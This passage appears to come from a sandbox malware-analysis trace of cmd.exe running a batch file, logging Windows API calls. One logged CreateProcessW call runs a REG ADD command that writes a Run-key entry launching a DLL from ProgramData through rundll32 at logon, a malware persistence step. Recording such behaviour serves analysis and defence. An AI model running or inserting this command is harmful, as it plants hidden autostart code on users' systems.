lpMode=0x2ef3c8) returned 1 [0213.438] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.438] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49db6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2ef408, lpReserved=0x0 | out: lpBuffer=0x49db6340*, lpNumberOfCharsWritten=0x2ef408*=0x2) returned 1 [0213.439] _wcsicmp (_String1="REG", _String2="DIR") returned 14 [0213.439] _wcsicmp (_String1="REG", _String2="ERASE") returned 13 [0213.439] _wcsicmp (_String1="REG", _String2="DEL") returned 14 [0213.439] _wcsicmp (_String1="REG", _String2="TYPE") returned -2 [0213.439] _wcsicmp (_String1="REG", _String2="COPY") returned 15 [0213.439] _wcsicmp (_String1="REG", _String2="CD") returned 15 [0213.439] _wcsicmp (_String1="REG", _String2="CHDIR") returned 15 [0213.439] _wcsicmp (_String1="REG", _String2="RENAME") returned -7 [0213.439] _wcsicmp (_String1="REG", _String2="REN") returned -7 [0213.439] _wcsicmp (_String1="REG", _String2="ECHO") returned 13 [0213.439] _wcsicmp (_String1="REG", _String2="SET") returned -1 [0213.439] _wcsicmp (_String1="REG", _String2="PAUSE") returned 2 [0213.439] _wcsicmp (_String1="REG", _String2="DATE") returned 14 [0213.439] _wcsicmp (_String1="REG", _String2="TIME") returned -2 [0213.439] _wcsicmp (_String1="REG", _String2="PROMPT") returned 2 [0213.439] _wcsicmp (_String1="REG", _String2="MD") returned 5 [0213.439] _wcsicmp (_String1="REG", _String2="MKDIR") returned 5 [0213.439] _wcsicmp (_String1="REG", _String2="RD") returned 1 [0213.439] _wcsicmp (_String1="REG", _String2="RMDIR") returned -8 [0213.439] _wcsicmp (_String1="REG", _String2="PATH") returned 2 [0213.439] _wcsicmp (_String1="REG", _String2="GOTO") returned 11 [0213.439] _wcsicmp (_String1="REG", _String2="SHIFT") returned -1 [0213.439] _wcsicmp (_String1="REG", _String2="CLS") returned 15 [0213.439] _wcsicmp (_String1="REG", _String2="CALL") returned 15 [0213.440] _wcsicmp (_String1="REG", _String2="VERIFY") returned -4 [0213.440] _wcsicmp (_String1="REG", _String2="VER") returned -4 [0213.440] _wcsicmp (_String1="REG", _String2="VOL") returned -4 [0213.440] _wcsicmp (_String1="REG", _String2="EXIT") returned 13 [0213.440] _wcsicmp (_String1="REG", _String2="SETLOCAL") returned -1 [0213.440] _wcsicmp (_String1="REG", _String2="ENDLOCAL") returned 13 [0213.440] _wcsicmp (_String1="REG", _String2="TITLE") returned -2 [0213.440] _wcsicmp (_String1="REG", _String2="START") returned -1 [0213.440] _wcsicmp (_String1="REG", _String2="DPATH") returned 14 [0213.440] _wcsicmp (_String1="REG", _String2="KEYS") returned 7 [0213.440] _wcsicmp (_String1="REG", _String2="MOVE") returned 5 [0213.440] _wcsicmp (_String1="REG", _String2="PUSHD") returned 2 [0213.440] _wcsicmp (_String1="REG", _String2="POPD") returned 2 [0213.440] _wcsicmp (_String1="REG", _String2="ASSOC") returned 17 [0213.440] _wcsicmp (_String1="REG", _String2="FTYPE") returned 12 [0213.440] _wcsicmp (_String1="REG", _String2="BREAK") returned 16 [0213.440] _wcsicmp (_String1="REG", _String2="COLOR") returned 15 [0213.440] _wcsicmp (_String1="REG", _String2="MKLINK") returned 5 [0213.440] GetProcessHeap () returned 0x450000 [0213.440] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x420) returned 0x46bda0 [0213.440] SetErrorMode (uMode=0x0) returned 0x8001 [0213.440] SetErrorMode (uMode=0x1) returned 0x0 [0213.441] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x46bdb0, lpFilePart=0x2ef1a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x2ef1a0*="Desktop") returned 0x19 [0213.441] SetErrorMode (uMode=0x8001) returned 0x1 [0213.441] GetProcessHeap () returned 0x450000 [0213.441] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x46bda0, Size=0x4c) returned 0x46bda0 [0213.441] GetProcessHeap () returned 0x450000 [0213.441] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x46bda0) returned 0x4c [0213.441] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49d9f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91 [0213.441] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0213.441] GetProcessHeap () returned 0x450000 [0213.441] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x16c) returned 0x46be00 [0213.441] GetProcessHeap () returned 0x450000 [0213.441] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x2c8) returned 0x46bf80 [0213.441] GetProcessHeap () returned 0x450000 [0213.441] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x46bf80, Size=0x16e) returned 0x46bf80 [0213.441] GetProcessHeap () returned 0x450000 [0213.441] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x46bf80) returned 0x16e [0213.441] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49d9f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0213.441] GetProcessHeap () returned 0x450000 [0213.441] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xe8) returned 0x46c100 [0213.441] GetProcessHeap () returned 0x450000 [0213.441] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x46c100, Size=0x7e) returned 0x46c100 [0213.441] GetProcessHeap () returned 0x450000 [0213.441] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x46c100) returned 0x7e [0213.442] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0213.442] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\REG.*", fInfoLevelId=0x1, lpFindFileData=0x2eef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef10) returned 0xffffffffffffffff [0213.442] GetLastError () returned 0x2 [0213.442] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\REG", fInfoLevelId=0x1, lpFindFileData=0x2eef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef10) returned 0xffffffffffffffff [0213.442] GetLastError () returned 0x2 [0213.442] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0213.442] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\REG.*", fInfoLevelId=0x1, lpFindFileData=0x2eef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef10) returned 0x46c190 [0213.443] GetProcessHeap () returned 0x450000 [0213.443] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x464670, Size=0x8) returned 0x46a1c0 [0213.443] FindClose (in: hFindFile=0x46c190 | out: hFindFile=0x46c190) returned 1 [0213.443] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.COM", fInfoLevelId=0x1, lpFindFileData=0x2eef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef10) returned 0xffffffffffffffff [0213.443] GetLastError () returned 0x2 [0213.443] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.EXE", fInfoLevelId=0x1, lpFindFileData=0x2eef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef10) returned 0x46c190 [0213.443] FindClose (in: hFindFile=0x46c190 | out: hFindFile=0x46c190) returned 1 [0213.443] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0213.443] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0213.443] GetConsoleTitleW (in: lpConsoleTitle=0x2ef160, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.444] GetProcessHeap () returned 0x450000 [0213.444] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x218) returned 0x46c190 [0213.444] GetProcessHeap () returned 0x450000 [0213.444] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x126) returned 0x46c3b0 [0213.444] GetProcessHeap () returned 0x450000 [0213.444] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x420) returned 0x46c4e0 [0213.444] SetErrorMode (uMode=0x0) returned 0x8001 [0213.444] SetErrorMode (uMode=0x1) returned 0x0 [0213.444] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x46c4f0, lpFilePart=0x2ee9f0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x2ee9f0*="Desktop") returned 0x19 [0213.444] SetErrorMode (uMode=0x8001) returned 0x1 [0213.444] GetProcessHeap () returned 0x450000 [0213.444] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x46c4e0, Size=0x4c) returned 0x46c4e0 [0213.444] GetProcessHeap () returned 0x450000 [0213.444] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x46c4e0) returned 0x4c [0213.444] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49d9f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91 [0213.444] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0213.444] GetProcessHeap () returned 0x450000 [0213.444] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x16c) returned 0x46c540 [0213.444] GetProcessHeap () returned 0x450000 [0213.444] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x2c8) returned 0x46c6c0 [0213.445] GetProcessHeap () returned 0x450000 [0213.445] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x46c6c0, Size=0x16e) returned 0x46c6c0 [0213.445] GetProcessHeap () returned 0x450000 [0213.445] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x46c6c0) returned 0x16e [0213.445] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49d9f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0213.445] GetProcessHeap () returned 0x450000 [0213.445] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xe8) returned 0x46c840 [0213.445] GetProcessHeap () returned 0x450000 [0213.445] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x46c840, Size=0x7e) returned 0x46c840 [0213.445] GetProcessHeap () returned 0x450000 [0213.445] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x46c840) returned 0x7e [0213.445] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0213.445] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\REG.*", fInfoLevelId=0x1, lpFindFileData=0x2ee760, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ee760) returned 0xffffffffffffffff [0213.445] GetLastError () returned 0x2 [0213.445] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\REG", fInfoLevelId=0x1, lpFindFileData=0x2ee760, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ee760) returned 0xffffffffffffffff [0213.445] GetLastError () returned 0x2 [0213.446] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0213.446] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\REG.*", fInfoLevelId=0x1, lpFindFileData=0x2ee760, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ee760) returned 0x46c8d0 [0213.446] FindClose (in: hFindFile=0x46c8d0 | out: hFindFile=0x46c8d0) returned 1 [0213.446] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.COM", fInfoLevelId=0x1, lpFindFileData=0x2ee760, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ee760) returned 0xffffffffffffffff [0213.446] GetLastError () returned 0x2 [0213.446] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.EXE", fInfoLevelId=0x1, lpFindFileData=0x2ee760, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ee760) returned 0x46c8d0 [0213.446] FindClose (in: hFindFile=0x46c8d0 | out: hFindFile=0x46c8d0) returned 1 [0213.446] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0213.446] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0213.446] GetConsoleTitleW (in: lpConsoleTitle=0x2eecb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.447] InitializeProcThreadAttributeList (in: lpAttributeList=0x2eea68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2eea28 | out: lpAttributeList=0x2eea68, lpSize=0x2eea28) returned 1 [0213.447] UpdateProcThreadAttribute (in: lpAttributeList=0x2eea68, dwFlags=0x0, Attribute=0x60001, lpValue=0x2eea18, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2eea68, lpPreviousValue=0x0) returned 1 [0213.447] GetStartupInfoW (in: lpStartupInfo=0x2eeb80 | out: lpStartupInfo=0x2eeb80*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x481, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0213.447] GetProcessHeap () returned 0x450000 [0213.447] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x20) returned 0x464670 [0213.447] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38 [0213.447] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0213.447] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0213.447] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0213.447] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0213.447] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0213.447] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0213.447] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0213.447] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0213.447] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0213.447] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0213.447] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0213.447] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0213.447] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0213.447] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0213.447] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0213.448] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0213.448] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0213.448] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0213.448] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0213.448] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0213.448] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0213.448] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0213.448] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0213.448] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0213.448] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0213.448] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0213.448] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0213.448] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0213.448] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0213.448] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16 [0213.448] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0213.448] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0213.448] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0213.448] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0213.448] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0213.448] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0213.448] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0213.448] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0213.448] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0213.448] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0213.448] GetProcessHeap () returned 0x450000 [0213.448] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x464670 | out: hHeap=0x450000) returned 1 [0213.448] GetProcessHeap () returned 0x450000 [0213.448] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x12) returned 0x4718b0 [0213.449] lstrcmpW (lpString1="\\reg.exe", lpString2="\\XCOPY.EXE") returned -1 [0213.450] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\reg.exe", lpCommandLine="REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v AutoStart /t REG_SZ /d \"rundll32.exe C:\\ProgramData\\DataExchange.dll,Start\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\aETAdzjz\\Desktop", lpStartupInfo=0x2eeaa0*(cb=0x70, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v AutoStart /t REG_SZ /d \"rundll32.exe C:\\ProgramData\\DataExchange.dll,Start\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2eea50 | out: lpCommandLine="REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v AutoStart /t REG_SZ /d \"rundll32.exe C:\\ProgramData\\DataExchange.dll,Start\"", lpProcessInformation=0x2eea50*(hProcess=0x58, hThread=0x5c, dwProcessId=0xa1c, dwThreadId=0xa2c)) returned 1 [0213.522] CloseHandle (hObject=0x5c) returned 1 [0213.522] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0213.522] GetProcessHeap () returned 0x450000 [0213.522] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x468bc0 | out: hHeap=0x450000) returned 1 [0213.522] GetEnvironmentStringsW () returned 0x468bc0* [0213.522] GetProcessHeap () returned 0x450000 [0213.522] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xb28) returned 0x46ca50 [0213.522] FreeEnvironmentStringsW (penv=0x468bc0) returned 1 [0213.522] WaitForSingleObject (hHandle=0x58, dwMilliseconds=0xffffffff) returned 0x0 [0215.042] GetExitCodeProcess (in: hProcess=0x58, lpExitCode=0x2ee998 | out: lpExitCode=0x2ee998*=0x0) returned 1 [0215.042] CloseHandle (hObject=0x58) returned 1 [0215.042] _vsnwprintf (in: _Buffer=0x2eec08, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ee9a8 | out: _Buffer="00000000") returned 8 [0215.042] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0215.042] GetProcessHeap () returned 0x450000 [0215.042] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46ca50 | out: hHeap=0x450000) returned 1 [0215.042] GetEnvironmentStringsW () returned 0x46e0e0* [0215.042] GetProcessHeap () returned 0x450000 [0215.042] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xb4e) returned 0x46ec40 [0215.043] FreeEnvironmentStringsW (penv=0x46e0e0) returned 1 [0215.043] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0215.043] GetProcessHeap () returned 0x450000 [0215.043] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46ec40 | out: hHeap=0x450000) returned 1 [0215.043] GetEnvironmentStringsW () returned 0x46e0e0* [0215.043] GetProcessHeap () returned 0x450000 [0215.043] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xb4e) returned 0x46ec40 [0215.043] FreeEnvironmentStringsW (penv=0x46e0e0) returned 1 [0215.043] GetProcessHeap () returned 0x450000 [0215.043] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4718b0 | out: hHeap=0x450000) returned 1 [0215.043] DeleteProcThreadAttributeList (in: lpAttributeList=0x2eea68 | out: lpAttributeList=0x2eea68) [0215.043] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.043] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0215.043] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.043] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49d9e194 | out: lpMode=0x49d9e194) returned 1 [0215.044] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.044] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49d9e198 | out: lpMode=0x49d9e198) returned 1 [0215.044] SetConsoleInputExeNameW () returned 0x1 [0215.044] GetConsoleOutputCP () returned 0x1b5 [0215.044] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dabfe0 | out: lpCPInfo=0x49dabfe0) returned 1 [0215.044] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0215.044] CreateFileW (lpFileName="C:\\ProgramData\\tt.bat" (normalized: "c:\\programdata\\tt.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ef3b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0215.045] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0215.045] _get_osfhandle (_FileHandle=3) returned 0x58 [0215.045] SetFilePointer (in: hFile=0x58, lDistanceToMove=139, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8b [0215.045] GetProcessHeap () returned 0x450000 [0215.045] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46c840 | out: hHeap=0x450000) returned 1 [0215.045] GetProcessHeap () returned 0x450000 [0215.045] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46c6c0 | out: hHeap=0x450000) returned 1 [0215.045] GetProcessHeap () returned 0x450000 [0215.045] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46c540 | out: hHeap=0x450000) returned 1 [0215.045] GetProcessHeap () returned 0x450000 [0215.045] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46c4e0 | out: hHeap=0x450000) returned 1 [0215.045] GetProcessHeap () returned 0x450000 [0215.045] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46c3b0 | out: hHeap=0x450000) returned 1 [0215.045] GetProcessHeap () returned 0x450000 [0215.045] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46c190 | out: hHeap=0x450000) returned 1 [0215.045] GetProcessHeap () returned 0x450000 [0215.045] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46c100 | out: hHeap=0x450000) returned 1 [0215.045] GetProcessHeap () returned 0x450000 [0215.045] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46bf80 | out: hHeap=0x450000) returned 1 [0215.045] GetProcessHeap () returned 0x450000 [0215.045] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46be00 | out: hHeap=0x450000) returned 1 [0215.045] GetProcessHeap () returned 0x450000 [0215.045] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46bda0 | out: hHeap=0x450000) returned 1 [0215.045] GetProcessHeap () returned 0x450000 [0215.045] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46bc70 | out: hHeap=0x450000) returned 1 [0215.045] GetProcessHeap () returned 0x450000 [0215.045] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x471890 | out: hHeap=0x450000) returned 1 [0215.045] GetProcessHeap () returned 0x450000 [0215.045] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46bbb0 | out: hHeap=0x450000) returned 1 [0215.046] _get_osfhandle (_FileHandle=3) returned 0x58 [0215.046] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8b [0215.046] ReadFile (in: hFile=0x58, lpBuffer=0x49dac320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x2ef1c0, lpOverlapped=0x0 | out: lpBuffer=0x49dac320*, lpNumberOfBytesRead=0x2ef1c0*=0x0, lpOverlapped=0x0) returned 1 [0215.046] GetLastError () returned 0x0 [0215.046] _get_osfhandle (_FileHandle=3) returned 0x58 [0215.046] GetFileType (hFile=0x58) returned 0x1 [0215.046] _get_osfhandle (_FileHandle=3) returned 0x58 [0215.046] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8b [0215.046] GetProcessHeap () returned 0x450000 [0215.046] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4012) returned 0x471f70 [0215.046] GetProcessHeap () returned 0x450000 [0215.046] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x471f70 | out: hHeap=0x450000) returned 1 [0215.046] _get_osfhandle (_FileHandle=3) returned 0x58 [0215.046] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8b [0215.047] ReadFile (in: hFile=0x58, lpBuffer=0x49dac320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x2ef190, lpOverlapped=0x0 | out: lpBuffer=0x49dac320*, lpNumberOfBytesRead=0x2ef190*=0x0, lpOverlapped=0x0) returned 1 [0215.047] GetLastError () returned 0x0 [0215.047] _get_osfhandle (_FileHandle=3) returned 0x58 [0215.047] GetFileType (hFile=0x58) returned 0x1 [0215.047] _get_osfhandle (_FileHandle=3) returned 0x58 [0215.047] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8b [0215.047] GetProcessHeap () returned 0x450000 [0215.047] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4012) returned 0x471f70 [0215.047] GetProcessHeap () returned 0x450000 [0215.047] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x471f70 | out: hHeap=0x450000) returned 1 [0215.047] longjmp () [0215.048] _tell (_FileHandle=3) returned 139 [0215.048] _close (_FileHandle=3) returned 0 [0215.049] CmdBatNotification () returned 0x0 [0215.049] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.049] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0215.049] _get_osfhandle 